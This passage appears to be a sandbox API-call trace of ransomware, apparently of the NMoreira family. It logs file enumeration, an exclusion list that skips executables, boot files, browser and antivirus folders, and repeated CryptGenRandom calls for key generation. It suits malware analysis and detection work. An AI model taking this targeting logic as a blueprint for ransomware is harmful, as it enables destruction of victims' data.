Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\winrar\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\java\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\windows\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\ESET\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\AVG\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*Atheros*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*Realtek*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*bootmgr*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*boot*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*boot*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*IO.SYS*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.059] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*ntldr*") returned 0 [0161.060] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*chrome*") returned 0 [0161.060] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*opera*") returned 0 [0161.060] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", pszSpec="*firefox*") returned 0 [0161.060] wcslen (_String="\\\\?\\") returned 0x4 [0161.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad3b8 [0161.060] wcscmp (_String1=".", _String2=".") returned 0 [0161.060] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.060] wcscmp (_String1="..", _String2=".") returned 1 [0161.060] wcscmp (_String1="..", _String2="..") returned 0 [0161.060] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0161.060] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0161.061] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0161.061] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui", pszSpec="*") returned 1 [0161.061] strlen (_Str="NMoreira") returned 0x8 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 